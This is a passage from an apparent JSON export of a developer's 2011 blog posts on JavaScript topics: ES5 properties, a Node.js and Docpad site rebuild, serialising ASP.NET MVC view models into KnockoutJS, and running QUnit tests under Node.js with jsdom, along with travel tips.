appeal of Flash I also never got into Silverlight as there was never a problem in my life that it would solve.\nThe one thing I do remember from my brief foray into that scary other world is the reliance on INotifyPropertyChanged and INotifyPropertyChanging interfaces. I’ve always thought that the idea behind these two interfaces was a good one, the primary problem though is how you actually have to implement them. Seriously, there’s a lot of shit code you have to implement.\nSo I decided to do something a bit silly, I decided to implement the two interfaces in JavaScript.\nA dumb idea with a point Now I see no real reason to use the code that I’m going to look at in any current development (I’ll explain why later) but more importantly I want to look at something that is part of ECMAScript 5 that doesn’t get the attention it deserves, Object.defineProperty.\nJavaScript properties throughout historyJavaScript, unlike languages such as C#, doesn’t really have this concept of a property like you get there, the idea of a get and set operating being something that you can control. Really this is how a class in JavaScript with some public properties looks:\nvar person = { firstName: 'Aaron', lastName: 'Powell' }; And when we want to update a property we’d do something like this:\nperson.firstName = 'John'; Now there’s nothing wrong with this, it does what you’ll want to do in a lot of scenarios, the problem is when you’re wanting a slightly more complex scenario, say you want to react to a change to the firstName property, maybe perform some validation.\nLet’s assume we want to have an age property on our person. Obviously we want to make sure that age is at least 0 and probably less than 110 (sounds reasonable :P), well how do you do this?\nValidation before assigning the property? That’ll work, but what if we’re exposing it to external API’s? How can we enforce the validation to them? 
Functions as properties The general way which this problem is solved is to rather than use assignable properties you use functions as properties, making your code look like this:\nvar person = (function() { var _age; return { //firstName, lastName, etc age: function(val) { if(val !== undefined && (val >= 0 && val <= 100) { _age = val; } else { //Raise an error } return _age; } } })(); Now we use the age property like so:\nperson.age(27); console.log(person.age()); //outputs 27 Now this isn’t really that bad, the main pain point to it is that we now have a different way to assign the value, we do it through a function invocation rather than through an assignment statement. This can come to light if you’re writing a JavaScript templating engine, you need to check if the property is actually a property or a function property. But we do get some nice stuff like the fact that in JavaScript you don’t need to do overloads so we can have the one function perform both the get and set operation for our property.\nLibraries such as KnockoutJS use this pattern for properties to do their UI binding but it can cause confusion, like in KnockoutJS if you want to bind to a property you’d do something like this: data-bind="css: { someClass: someBoolean }" which Knockout will understand it’s an observable property and bind to the result of the function, but if you want to use the false value you need to do data-bind="css: { someClass: !someBoolean() }". Note that this time it’s invoked the property as a function rather than just using the property.\nThe can be a bit confusing and I’ve seen more than one developer (including myself) getting stumped as to why their bindings weren’t working only to realise that it’d because they are binding to !someBoolean which equates to !function() { } rather than the result of the function. It’s a very face-palm moment.\nIntroducing ES5 propertiesAs part of the ECMAScript 5 spec the concept of properties was addresses and has resulted in the Object.defineProperty API (and an API to define multiple at once, being Object.defineProperties) and this allows us to (among other things) define get and set method bodies for our properties.\nLet’s revisit our person.age property example from above, but do it using an ECMAScript 5 property:\nvar person = (function() { var _age; var newPerson = { firstName: 'Aaron', lastName: 'Powell' }; Object.defineProperty(newPerson, 'age', { get: function() { return _age; }, set: function(value) { if(value && value >= 0 && value <= 110) { _age = value } else { //raise error } } }); return newPerson; })(); person.age = 27; console.log(person.age); Hopefully you can see here the difference between the function property and the ES5 property.\nWith ES5 the property with a function body looks just like a public field. Now there’s a few other things you can do here, such as make properties read-only and exclude them from for...in loops, and for that check out the MDN (you can also do body-less properties), but it makes it very easy to build smarts into your objects. Also like .NET if you want to provide a get/set you need to have a backing store, but that’s easy to get around with closure scope.\nSo that covers a basic look ES5 properties. Now back to our bad idea…\nImplementing INotifyPropertyChange in JavaScriptAs I demonstrated above it is possible to add a body to your properties let’s do something with that idea.\nIf you’re not familiar with INotifyPropertyChang* then you should read the MSDN docs. 
The TL;DR is that you use trigger the Changing event before you assign the property and then the Changed event after it’s assigned and the UI can react.\nAs I said I think there’s a lot of value in this pattern, it’s just that as most Xaml devs will tell you implementing it is a real pain in the ass.\nSo say you wanted to implement it in JavaScript, it’s not overly hard, ultimately we need to do something like this:\nObject.defineProperty(foo, 'prop', { get: function() { return _prop; }, set: function(val) { propertyChanging(this, 'prop'); _prop = val; propertyChanged(this, 'prop');\t} }); I’ve ignored the guff code like what the propertyChang* methods are doing as well as subscribing handlers to the events but you get the idea. This really don’t look any different to the C# version though does it? So what’s the point?\nMaking it better through the magic of JavaScript As you can see there’s a lot of boilerplate code that you need to get this working. In .NET there’s no real way to avoid this (unless you do some magic under the covers). But one of the cool things about JavaScript being a dynamic language is that we can modify an object pretty damn easily. Let’s go back to our person object:\nvar person = { firstName: 'Aaron', lastName: 'Powell', age: 27 }; Now imagine that I want to implement my JavaScript version of INotifyPropertyChang* on it so that my UI can react whenever I update the values, but I don’t want to be going through and writing this all out myself, I’ve got a bunch of objects that I want to promote to implementing the interfaces.\nWell since JavaScript doesn’t actually have interfaces in the language it’s a bit tricky, and this is where my funky little script comes in.\nHello Xamlizer!\nSo I’ve created a little JavaScript code snippet which I’ve called Xamlizer that’ll take an object and implement INotifyPropertyChang* on it. Now the script isn’t really that smart, all it does is goes through all the properties of the object and then converts them into properties that implement our pattern.\nYou can then use it like this:\nvar person = { firstName: 'Aaron', lastName: 'Powell', age: 27 }; xamlizer(person); person.addPropertyChanging(function(object, property) { console.log('Property ' + property + 'changing'); }); person.age = 28; And there we go, we’ve got a script that’ll turn our normal JavaScript objects into something that can notify subscribers when the property changes.\nIf you dig into the code for Xamlizer you’ll see that it doesn’t do anything really complex, it just modifies some properties. Note: As I said it’s not really that smart, it actually modifies anything public on the object, so if you have a function that is public it might get crazy :P. 
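To fill in the guff code that got glossed over, the plumbing could be sketched roughly like this (a hypothetical reconstruction, not Xamlizer's actual source; the handler arrays and internal function names are assumptions):

```javascript
// Hypothetical sketch of the plumbing, not Xamlizer's real implementation
function xamlizer(obj) {
    var changingHandlers = [],
        changedHandlers = [],
        props = Object.keys(obj); // snapshot the public members before we add our own

    // the subscription methods used in the example above
    obj.addPropertyChanging = function (handler) { changingHandlers.push(handler); };
    obj.addPropertyChanged = function (handler) { changedHandlers.push(handler); };

    var propertyChanging = function (o, prop) {
        for (var i = 0; i < changingHandlers.length; i++) changingHandlers[i](o, prop);
    };
    var propertyChanged = function (o, prop) {
        for (var i = 0; i < changedHandlers.length; i++) changedHandlers[i](o, prop);
    };

    // replace each public member with an ES5 property that raises the events around assignment
    props.forEach(function (prop) {
        var value = obj[prop];
        Object.defineProperty(obj, prop, {
            get: function () { return value; },
            set: function (val) {
                propertyChanging(obj, prop);
                value = val;
                propertyChanged(obj, prop);
            }
        });
    });
}
```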
But hey, it’s just demo code!\nAnd if you want to see it in action check out the jsfiddle.\nConclusionWell this wraps up our look at the limitations in how you have to do properties in ES3, the changes which ES5 provides you with (although their usefulness at the moment is debatable since we have to support ES3 browsers for a while still) and finished off with looking at how to implement a generic library to change fields to properties with debatable usefulness.\n", "id": "2011-10-24-xamlizer-implementing-something-silly-in-javascript" }, { "title": "Rebuilding JavaScript Quiz in Nodejs", "url": "https://www.aaron-powell.com/posts/2011-10-12-rebuilding-javascript-quiz-in-nodejs/", "date": "Wed, 12 Oct 2011 00:00:00 +0000", "tags": [ "nodejs", "javascript" ], "description": "", "content": "A few months back I announced a new site I was running called JavaScript Quiz. When I started to site it was to be done quickly so I chose an out-of-the-box blogging platform, that being Posterous.\nSince then I’ve come to realise that it isn’t the platform I want wanting to go with. One of my main problems with it is its comment management system. Anyone who has submitted an answer to me will know what I’m talking about, the excessive spam which you end up with when I do publish all the answers.\nWell because of this I decided to move away from Posterous and go with a new platform. As my new platform I decided that I wanted to use Node.js because well this is a JavaScript quiz so why not use JavaScript!\nThe softwareWhen looking at what I wanted to do with the new site I decided I wanted something that was easy to create a site in and also easy to update content it. A lot of people are raving about Jekyll of recent, which is a Ruby CMS which runs a flat file system website and Markdown as an editing language.\nThis seemed ideal, JavaScript Quiz isn’t a big site nor is it a dynamic site so something that runs off flat files is very ideal. I’m also quite a fan of Markdown (which we use in FunnelWeb) so being able to write my posts in that is very nice an idea.\nSo I started looking for a Node.js alternative as I’d prefer to use something than write it myself (I’m a bit over developing a CMS at the moment) and I came across a project called Docpad.\nIntro to Docpad Docpad is a Node.js CMS in a similar style to Jekyll written by a guy from Sydney named Benjamin Lupton (and I like supporting home-grown software so that was a big plus). It’s got a good set of templating engines to pick from so you don’t have to use raw HTML if you want something a bit more cool for your templates (more shortly) and best of all it’s shit simple to use.\nYou need to install the following npm packages and you’re off and running:\ncoffee-script express docpad You’re better off installing both coffee-script and docpad globally since they both have executables but you don’t have to.\nNote: I had problems using Node.js with cygwin on Windows, I couldn’t get docpad to install but that seemed to be a cygwin issue as it worked fine on both my Linux and OSX machines, just something to watch out for :).\nThis isn’t a Docpad tutorial, go check out the docs if you want to learn more.\nTemplates As I mentioned Docpad has a number of different HTML templating engines available, you can use Eco, Jade, Haml or the one I chose, CoffeeKup!\nCoffeeKup is a way of using CoffeeScript as a HTML template engine. 
It’s pretty cool and it means that you’re able to do some really powerful things with the templates and interacting with the document you’re rendering. Plus it means that we’re using JavaScript/ CofeeScript for most of our site (one language to rule them all!).\nCSS I’m not using any of the CSS templating engines (despite submitting a request for CCSS to be included :P) mainly because I’m using HTML5 Boiler Plate’s css and I don’t want to have to convert it every time I upgrade.\nThe rest of the CSS is really basic and I’ve just cobbled together so I can get the site live, expect it to be improved as I get more time.\nFixing commentingAs I mentioned commenting is something that was really a pain to anyone who was entering the quiz each week as you’d get spammed up with emails (don’t worry, I got them all as well so it was very annoying). Good news is that the new site wont have this problem, I’ve gone with Disqus for comments (still moderated) which means that it should be much nicer an experience.\nFrom an admin point of view it’s much nicer as well :).\nHostingOne advantage of Posterous was that it was a hosted solution so it wasn’t costing me any more and this is something that I wanted to ensure didn’t change. I decided that I’d go with Heroku for my hosting since they have offered Node.js hosting for a while now.\nThis means that I am also using Git to store the site and I have it hosted on GitHub at the moment (sorry it’s not a public repo :P).\nBecause of this I have a nice workflow of being able to edit my content, run it through the Docpad ‘compiler’ and commit in the generated HTML. This then goes up to Heroku and just runs off the flat files.\nIdeally I’d not be committing the generated files and have part of the app startup code generate the files but so far I’ve had nothing but trouble getting it working that way. Heroku’s cedar stack (which is where node.js runs) is a writable file system but something still seems to be going amiss (and it’s not exactly easy to dig into…).\nWrap upSo this is how I’ve gone about the relaunch of JavaScript Quiz. The new site should be active soon (awaiting the DNS to change over :P). I wont be porting the old comments so the old site will stay active. Hopefully I’ve got the redirects all sorted out (yes the 404 page is pretty shit so far :P). Hopefully this provides a nice new home for the site.\n", "id": "2011-10-12-rebuilding-javascript-quiz-in-nodejs" }, { "title": "Tips for travelling as a geek", "url": "https://www.aaron-powell.com/posts/2011-10-12-tips-for-travelling-as-a-geek/", "date": "Wed, 12 Oct 2011 00:00:00 +0000", "tags": [ "random" ], "description": "", "content": "Anyone who follows me on twitter will have probably noticed that in the last two weeks I’ve been tweeting with a geolocation in Vietnam. If you’re really smart you may have worked out that I was on holidays over there!\nI had a bit of tech with me, an iPad, iPhone, laptop and 2 kindles so I thought I’d share some of my experiences and tips for travelling as a geek.\nStay connectedSomething that I find is very useful when travelling is having access to the internet. It allows me to do those useful things such as email/ skype my parents, use google maps and check in on foursquare.\nSo my first pointer when going overseas is work out how you plan to stay connected. Most hotels I’ve stayed in recently have had free wifi so if that’s good enough for you then check out the places you plan to stay. 
Also a lot of cafe’s and bars (particularly ones targeting travellers) offer free wifi so that can allow you your mid-day twitter fix.\nThe other option is picking up a local sim. I’ve been to the USA, Denmark and Vietnam this year and all those countries have prepaid sims which you can pick up and drop into your device. For the USA check out things like GoPhone from AT&T. In Denmark I picked up a sim card from the post office (don’t remember who the provider was though) for 99 Danish Krone that lasted for 1 week and in Vietnam I got a sim for a month for the whole of $1USD!\nSo before you go check out the country and you’ll probably find an easy way to pick up a sim card. We found this really useful in Vietnam as it meant we could look up an address rather than relying on shitty maps in guide books, saving an argument or two with the girlfriend :P.\nBefore you go for a local sim card make sure your phone is network unlocked. I ended up in Denmark with a network locked phone and my sim wasn’t usable in it :(\nInternet beats booksLike a studious traveller we picked up our copy of the Lonely Planet but by the end of the trip we were only use it for one purpose, the find out where not to go.\nNow I don’t want to rag on Lonely Planet too much but it’s really hard for a print book to keep pace with the internet. Instead we turned to good ol’ technology (since I had a local sim) to find out stuff to do. Now I want to talk about two sites that are invaluable if you’re travelling.\nWikitravel Url: http://wikitravel.org\nWikitravel is the wikipedia of travel websites. It’s got lots of great tips on history of a place, what to see while you’re there how to get in, out and around. The kind of stuff you can get out of a Lonely Planet guide book but it is able to be kept up to date (say around pricing of cabs). It can even give you those handy tips that you wont find out until you’ve hit them (such as Melbourne trams having coin-only ticket machines).\nThat said be careful of vandalism/ shameless self promotion on the site, you’ll occasionally find companies promoting themselves on there. It’s generally pretty easy to pick them though.\nTrip Advisor Url: http://www.tripadvisor.com/\nTrip Advisor is a must when you’re planning your trip and when you’re away. The site is full of user generated content and allows for people to enter information about places they’ve visited, stayed, eaten at, etc and then vote against them.\nAgain this is something that kills Lonely Planet. Where Lonely Planet can only have a finite amount of places listed and gets out of date, a site based around generate content can reflect the actual mood of travellers to an area.\nWe used this to find recommendations for hotels, places to eat or just check out others opinions for places we got recommended by friends.\nHave adaptersIt goes without saying that when you’re travelling having local power adapters is a valuable thing but what I found more valuable was carrying a multi-port adapter. Don’t go crazy and take like a 10 port power board if you only have 2 devices but they can be handy (particularly if you’re travelling for work as well as play).\nTravel insuranceIt goes without saying that you should have travel insurance with you but make sure that your policy will cover you for the devices you are carrying with you. 
Last thing you want is to lose your laptop and find out that you only had $500 of coverage!\nI went with Travel Insurance Direct who have a reasonably well priced set of plans including yearly world-wide plans.\nTL;DR Get a local sim\nUse WikiTravel and Trip Advisor\nMake sure your travel insurance will cover your gear\n", "id": "2011-10-12-tips-for-travelling-as-a-geek" }, { "title": "Creating a ViewModel from the server", "url": "https://www.aaron-powell.com/posts/2011-09-18-creating-vms-from-server/", "date": "Sun, 18 Sep 2011 00:00:00 +0000", "tags": [ "knockoutjs", "javascript" ], "description": "", "content": "If you’ve been doing much work with KnockoutJS you’ll probably see examples where the code looks like this:\nvar todoViewModel = function() { this.items = new ko.observableArray(['Item 1', 'Item 2', 'Item 3']); this.selectedItem = new ko.observable('Item 1'); }; What I’m trying to point out here is that the viewModel is being defined in JavaScript and that the items within it are coded into your JavaScript.\nWhile you can argue that this is demo code and it should only be treated as such something I’ve noticed is there isn’t any other examples. I haven’t seen any example where they are talking about getting the data initially from the server for their viewModel.\nSo how do you approach this? In this article I’m going to look at how to create a viewModel from the server using ASP.Net MVC.\nNote: I’m talking about doing a viewModel as part of the initial page load since generally speaking you’ll have been doing data layer interaction as part of the request. Building a viewModel using an AJAX request is a different story and I wont be covering.\nFrom the server to the clientLet’s get started with an example of our controller:\npublic class TaskController : Controller { public ActionResult Index() { var vm = new TaskViewModel { Tasks = new[] { new Task("Write Blog Post"), new Task("Publish Blog Post") } }; return View(vm); } } I’m just going to have a reasonably simple ViewModel that just has a collection of tasks that I want to display as part of my KnockoutJS-built UI but the tasks are to be pulled in from my data layer (obviously this is demo code and it’s hard coded so you’ll have to use your imagination for that part :P).\nFor the view I’m just creating something that is very simple for the task list:\n<form data-bind="submit:addTask"> Add task: <input type="text" data-bind='value:taskToAdd, valueUpdate: "afterkeydown"' /> <button type="submit" data-bind="enable: taskToAdd().length > 0">Add</button> </form> <p>Your values:</p> <select multiple="multiple" height="5" data-bind="options:tasks"> </select> <div> <button data-bind="click: removeSelected, enable: hasTasks">Remove</button> <button data-bind="click: sortTasks, enable: hasTasks">Sort</button> </div> Now we have a conundrum, how do I as part of my response create a KnockoutJS ViewModel that I can then use in my UI?\nIt’s all about the serializationWhen I was prototyping this for my current project I remembers that Shannon has mentioned that he’d done something similar himself and I’ve shamelessly taken his approach and am using it :P.\nHis approach was to use a serializer to create a JSON object from the model (there was some other stuff in the skype message he sent me but I’ll confess to having not read that :P). For the serialization you can use the JavaScriptSerializer, the DataContractJsonSerializer or Json.NET. 
Personally I prefer Json.NET and it’s what I’ll be using in this demo.\nSo let’s make a little HTML helper to do this for us:\npublic static class HtmlHelperExtensions { public static IHtmlString KnockoutFrom<T>(this HtmlHelper<T> html, T obj) { var serializer = new JsonSerializer { ContractResolver = new CamelCasePropertyNamesContractResolver() }; return new HtmlString(JObject.FromObject(obj, serializer).ToString()); } } All we’re doing here is creating an instance of the JsonSerializer from Json.NET and telling it to use the CamelCasePropertyNamesContractResolver. This is why I like Json.NET, it allows me to convert my .NET naming conventions into JavaScript conventions without a lot of effort. Lastly we just return the serialized object. Not really anything special happening in here.\nNow in my View I can do this:\n@Html.KnockoutFrom(Model) Hmm but this isn’t really helpful, we’re just getting out JSON blob in our view, I still would have to do a bunch of work to actually make it usable and especially if I am doing this on a lot of pages it’s a lot of code that I’d prefer not to do every time. So let’s see if we can improve our extension method.\nSetting up the viewModelSo what do we want from our improved version? Well I’d like the observables to be set up for me and I’d like it to avoid global variables.\nTo do this what I’m going to do is update my extension method to use the Knockout Mapping plugin. This plugin is really sweet as it allows me to map a JSON object into a KnockoutJS object and is great when you’re working with AJAX data, you can easily pull down some data from the server and then use the plugin to extend it into your ViewModel.\nIn this case though I’m going to use it to map the JSON version of our server ViewModel into our KnockoutJS one:\npublic static IHtmlString KnockoutFrom<T>(this HtmlHelper<T> html, T obj) { var serializer = new JsonSerializer { ContractResolver = new CamelCasePropertyNamesContractResolver() }; var sb = new StringBuilder(); sb.Append("(function() {"); var json = JObject.FromObject(obj, serializer); sb.Append("var vm = ko.mapping.fromJS(" + json + ");"); sb.Append("ko.applyBindings(vm);"); sb.Append("})();"); return new HtmlString(sb.ToString()); } The main updates here are:\nI’m using a StringBuilder to build up some JavaScript (normally I hate server-generated JavaScript but here it serves a good purpose) I’m creating an immediately-invoked function expression to prevent leakage I’m doing my binding straight away, hiding the need for that too Excellent, this works, at least it works to an extent as we still have a few problems:\nWhat if I want to restrict where the binding happens? What about adding methods to my KnockoutJS viewModel? Improving interactivityWhile the above will work fine for simple scenarios it’s not great if you have a complex UI that you want to work with, and realistically it’s not likely you’ll have a viewModel you don’t want to extend with dependantObservables or anything, so let’s do some refactoring.\nI’m going to change the end of my extension method to look like this:\nsb.Append("var vm = ko.mapping.fromJS(" + json + ");"); var type = obj.GetType(); var ns = JavaScriptify(type.Namespace); sb.Append("namespace('" + ns + "');"); sb.Append(ns + "." 
+ JavaScriptify(type.Name) + " = vm;"); sb.Append("})();"); return new HtmlString(sb.ToString()); What I’ve done here is instead of doing the bindings I’m just going to create a global object which the viewModel will be assigned to (but I am namespacing it so it’s a bit better). This object I can then interact with in my JavaScript and add methods/ properties/ etc to myself.\nI’m also using a helper method to make the .NET namespace & type names friendlier for JavaScript:\nprivate static string JavaScriptify(string s) { return string.Join(".", s.Split('.').Select(x => x[0].ToString().ToLower() + x.Substring(1, x.Length - 1))); } With this new extension method I can update my View to play around with the viewModel before binding:\n<script> @Html.KnockoutFrom(Model) $(function() { var model = knockout.serverViewModels.models.taskViewModel; model.addTask = function() {}; model.taskToAdd = new ko.observable(''); model.removeSelected = function() {}; model.hasTasks = function() {}; model.sortTasks = function() {}; ko.applyBindings(model); }); </script> ConclusionThis wraps up my post on how to convert your server ViewModel into something that can be used in your KnockoutJS, allowing you to push all data down in the initial request rather than subsequent ones.\nThanks to Shannon for the initial idea, hopefully this little extension will make it even easier.\nIf you want to grab the code it is available here.\nOne final note, the Json.NET serializer does support the DataMember attributes, so you can also selectively include properties from your server ViewModel by attributing them too.\n", "id": "2011-09-18-creating-vms-from-server" }, { "title": "So long and thanks for all the fish", "url": "https://www.aaron-powell.com/posts/2011-09-15-so-long-and-thanks-for-all-the-fish/", "date": "Thu, 15 Sep 2011 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": "So it saddens me to say but as of today I will not be contributing to Umbraco, I have been stepped down from my contributor role on the project.\nI wish Shannon, Alex, Matt, Niels and the rest of the team the best for the Umbraco 5 release.\n", "id": "2011-09-15-so-long-and-thanks-for-all-the-fish" }, { "title": "Going beyond the browser with QUnit - Part 2", "url": "https://www.aaron-powell.com/posts/2011-09-05-qunit-beyond-the-browser-part-2/", "date": "Mon, 05 Sep 2011 00:00:00 +0000", "tags": [ "javascript", "nodejs", "qunit" ], "description": "Working with the DOM and QUnit from Node.js", "content": "In my last post I talked about what you need to do if you want to monitor changes and run tests automatically under Node.js but there was a few assumptions in there. One of the main assumptions I had was that you weren’t doing any DOM interactions.\nIn this part we’re going to look at how you can use DOM interactions in your QUnit tests and still run them under Node.js.\nWorking in a DOM-less JavaScript environmentOne thing that can trip people up when they first come to Node.js is they don’t realise that JavaScript isn’t tied to the browser. In reality JavaScript is just a language that happens to be used predominately in the browser, meaning that the window object isn’t part of the JavaScript specification, it’s just something that’s part of the runtime.\nSo when you’re running your code under Node.js you can’t just document.getElementById or $('#foo'). 
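If you want to see this for yourself, a quick check in the Node.js REPL (or a throwaway script) makes the point, there are no browser globals to be found, only Node's own global object:

// a quick sanity check of what globals exist under Node.js
console.log(typeof window);    // 'undefined' - no browser window object
console.log(typeof document);  // 'undefined' - no DOM either
console.log(typeof global);    // 'object' - Node.js gives you 'global' instead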
Uh-oh, how are we going to run tests against the DOM, after all if you want to test a library like Knockout.Unobtrusive you kind of need to be able to do that!\nWell don’t fear, the smart people in the Node.js community have solved this problem with a nice little package, jsdom!\njsdom is essentially an implementation of the DOM in Node.js allowing you do create a document object, a window object and interact with it as though it was in a browser.\nNote: There are limitations to jsdom, it doesn’t do everything you’d want but it’s a great way to do basic interactions such as we want to do in our tests.\nUpdating out test runnerIn my previous post I showed you how to set up a basic test runner in your Cakefile. For our tests we’re going to need to add some new stuff into our runtime (Node.js) and to do that we can use the dep option when we set up the runner:\ntest = deps: ["./tests/test-env.js"] code: "./#{output}/#{file}.js", tests: "./tests/#{file}.tests.js" What I’m going to do is create a test-env.js file which will be executed before the tests, allowing me to set up our pesudo-DOM.\nCreating our test environmentI’m going to set up a few new variables:\nvar jsdom = require('jsdom'), fs = require('fs'), dom = fs.readFileSync("./tests/knockout.unobtrusive.tests.html").toString(), document = jsdom.jsdom(dom, null, { features: { QuerySelector: true } }), window = document.createWindow(), navigator = { userAgent: 'node-js' }; First thing I’m doing here is importing jsdom and fs. This will mean I can work with jsdom and the file system.\nThe next step is to pull in our test HTML page as a string. We’ve got some base HTML which we’ll be interacting with during our tests. This is also the HTML we’d be running in our browser for our browser-based tests because keep in mind we want to share our tests between Node.js and the browser.\nNow that we have our DOM as a string we’ll create our document object from it. One other thing we are doing is specifying that we do want querySelector and querySelectorAll available, and this is done with the { features: { QuerySelector: true } } argument to jsdom.\nLastly we need to create a window object and a navigator object.\nSo when we have all these local variables we need to make sure that they’ll be available everywhere:\nglobal.window = window; global.navigator = navigator; global.document = window.document; Unlike the browser Node.js’s global object is called global, once we add our variables to that they’ll be available in any of the other files we use in the runner.\nAugmenting our testsIn the original set of tests that were in the Knockout.Unobtrusive project there was a heavy reliance on jQuery. 
Now admittedly there is a jQuery npm package but I couldn’t get it running on Node.js 0.4.10 but it’s not really important (I’d prefer not to rely on jQuery in my tests anyway).\nSo I’m going to do a check for jQuery (our Node.js tests wont have it):\nvar get, getAll, camalizer, data, dataMatcher = /data-(.+)/, dashAlphaMatcher = /-([a-z])/ig; if(typeof $ !== 'undefined') { getAll = get = $; } else { camalizer = function(x, letter) { return letter.toUpperCase(); }; data = function(el) { var attribute, attributes = el.attributes, data = {}; for(var i = 0, il = attributes.length; i < il; i++) { attribute = attributes[i]; if(dataMatcher.test(attribute.name)) { data[attribute.name.match(dataMatcher)[1].replace(dashAlphaMatcher, camalizer)] = attribute.value; } } return function(attr) { return data[attr]; }; }; get = function(id) { if(id.indexOf('#') === 0) { id = id.substring(1, id.length); } var el = document.getElementById(id); if(!el) { el = document.querySelectorAll(id)[0]; } el.data = data(el); return el; }; getAll = function(selector) { var el, elements = document.querySelectorAll(selector); if(elements[0] && !elements[0].dataset) { for(var i=0, il=elements.length; i < il; i++) { el = elements[i]; el.data = data(el); } } elements.each = function(fn) { var that = this; that.forEach(function(value, index) { fn.apply(that, [index, value]); }); }; return elements; }; Ok so the obvious first step is to check for jQuery and then we’re deferring everything to that, but instead of just exposing $ I’m going to expose two methods, get and getAll. The former will be useful for getting a single element, the latter for multiple elements.\nNext I’m creating two helper methods, the first being a camel case method (handy for working with data-* and the second simulating the .data API which you get from jQuery itself.\nNote: The data method isn’t exactly the same as using the $.data API, but I’m only replicating what I need at the current time.\nIn our simulated data API it will iterate through all the attributes and find any data-* ones (using a regex to look for them) then turning them into camel cased strings (like the spec, so data-foo-bar becomes fooBar). It’s probably a bit more complicated than it needs to be but it works nicely as I want.\nThe only other interesting point of note is that the getAll method will also simulate the .each API from jQuery so that we can use those loops in our tests.\nAnd there you go you’re essentially done. Once you replace all your usages of jQuery in your tests for the get and getAll API then you’ll be ready to roll!\nBe careful with DOM manipulationsSomething that I got tripped up with when porting the Knockout.Unobtrusive tests was that you don’t want your DOM manipulations to persist across the tests.\nIf you’ve done work with QUnit you’ll know that if you a DOM element with an id of qunit-fixture then it’ll get rebuilt after every single test.\nWell there’s a problem, the Node.js implementation of QUnit isn’t designed to work with the DOM so naturally this doesn’t work. But it’s an easy one to get around, QUnit exposes a method called reset that you can use to force a reset of the qunit-fixture element. 
Since the Node.js one doesn’t worry about the DOM it doesn’t have this method.\nTo implement this ourselves we’ll create a module for our test that we can have a teardown method on the end of it:\nQUnit.module('createBindings', { teardown: function() { if(!QUnit.reset) { //do the reset } } }); Note: you need to either access module via QUnit.module or assign that to module yourself because module is a reserved word in Node.js.\nFor the reset method I’ve created a helper function back in the test-env.js file:\nglobal.rebuildDom = function() { global.document = jsdom.jsdom(dom, null, { features: { QuerySelector: true } }); global.window = global.document.createWindow(); }; This will rebuild both the document and window objects from the original DOM string. So we can update our module like so:\nQUnit.module('createBindings', { teardown: function() { if(!QUnit.reset) { rebuildDom(); } } }); ConclusionI’m aware that this has been a bit of a long and complicated post but hopefully it gives you some starting points for how you could approach doing online & offline JavaScript tests.\n", "id": "2011-09-05-qunit-beyond-the-browser-part-2" }, { "title": "Slides from WEB203", "url": "https://www.aaron-powell.com/posts/2011-09-04-slides/", "date": "Sun, 04 Sep 2011 00:00:00 +0000", "tags": [ "auteched", "speaking", "teched-au-2011" ], "description": "", "content": "I recently spoke at Teched AU in a session called Chasing the Evolving Web.\nHere’s the assets from the talk:\nSlides Recording And here’s a list of the tools which I looked at in my presentation:\nHTML5 Boilerplate\nModernizr\nYepNope.js\nRaphaelJS\nAmplifyJS\nKnockout\n", "id": "2011-09-04-slides" }, { "title": "Going beyond the browser with QUnit - Part 1", "url": "https://www.aaron-powell.com/posts/2011-09-03-qunit-beyond-the-browser-part-1/", "date": "Sat, 03 Sep 2011 00:00:00 +0000", "tags": [ "javascript", "nodejs", "qunit" ], "description": "Taking your QUnit tests out of the browser to use your tests with Node.js", "content": "When it comes to unit testing my JavaScript my preferred framework is QUnit. If you’re not familiar with QUnit it’s the test framework for jQuery so I think it’s reasonably well up to the task of testing JavaScript.\nRecently I wrote an article on a preparser I’ve written for Knockout. Interestingly enough at the same time Brendan Satrom had the same idea. I quite like the approach that Brendan has taken so I decided to have a poke around in the code and see if we could even merge the two projects.\nThe first thing I noticed when looking into the code was that it was written using CoffeeScript. The second thing I noticed was that the tests were all written using QUnit and were to be run in the browser. But there was a bit of a nuisance, the tests were against the compiles JavaScript, not the raw CoffeeScript (it was running against the generated file), to do any modifications, and test them, you have to copy the CoffeeScript to the online compiler, the back to the compiled file and then run the tests.\nI’m sure you can see where the problems can come into this solution.\nWell I’ve done a few small projects using CoffeeScript in the past and I’ve also included some tests into it so I decided at having a crack at getting this to work.\nGetting your tools togetherSo to get started I’m using Windows and I’m going to be using Node.js to do the browser-less coding. 
Although I’m aware there is a version of Node.js for Windows I’m still using a self-compiled version with cygwin because npm works fine under cygwin but not with the Windows compiled version.\nAdditionally I’m going to be using a few npm packages:\nCoffeeScript QUnit Colors Getting started by watching cakeIf you’ve done much work with CoffeeScript you’ll probably have come across the concept of a Cakefile, if you haven’t, a Cakefile is a CoffeeScript version of a Rakefile (or MSBuild is a similar concept if you’re coming from .NET just a lot more horrible), so I’m going to start off by using Cake to create a file system watcher.\nThe basic idea if I want to have a Cake task which will monitor for changes on the file system (specifically our CoffeeScript file) and when a change happens we’ll compile it to JavaScript and run our tests.\nFirst off I’ll define some constants in our Cakefile:\nfs = require 'fs' path = require 'path' CoffeeScript = require 'coffee-script' file = 'knockout.unobtrusive' source = 'coffee' output = 'js' Next it’s time to setup our watch task:\ntask 'watch', 'Watch prod source files and build changes', -> msg = "Watching for changes in #{source}" console.log msg fs.watchFile "#{source}/#{file}.coffee", (curr, prev) -> if +curr.mtime isnt +prev.mtime console.log "Saw change in #{source}/#{file}.coffee" try invoke 'build' console.log 'build complete' invoke 'tests' catch e msg = 'Error with CoffeeScript build' console.log msg console.log e We’re using the standard watchFile method in Node and in the callback we’ll ensure that the change times aren’t equal (double-checking for false positives) and if there’s a valid change we want to execute the following two tasks:\nbuild tests Additionally we’re wrapping this in a try/ catch so that if it fails we can provide a useful message but have the watcher keep running (say if you save while you’re half-way through a change you wont get a major failure or anything).\nNow let’s have a look at the build task. This task will allow us to compile our coffee file into JavaScript. This is just going to be a standard Cake task as well so you can use it elsewhere if you want:\ntask 'build', "builds #{file}", -> console.log "building #{file} from coffeescript" code = fs.readFileSync "#{source}/#{file}.coffee", 'utf8' fs.writeFile "#{output}/#{file}.js", CoffeeScript.compile code Since Node (well JavaScript) is a callback-based programming model generally speaking you’ll be doing asynchronous operations, even with the file system. Node has provided some changes though to allow for synchronous programming. In this case I’m going to be using the synchronous read operation. The main reason for this is so that I don’t have to pass around a callback which will then do the tests (this could get messy in the Cakefile).\nOnce the read operation is completed we pipe the output into the CofeeScript compiler API (which we can call from CoffeeScript/ JavaScript) and write the output of that into a JavaScript file.\nWhen the build task is done the next step in our watcher is to call out to our test runner. As mentioned above I wanted to reuse the 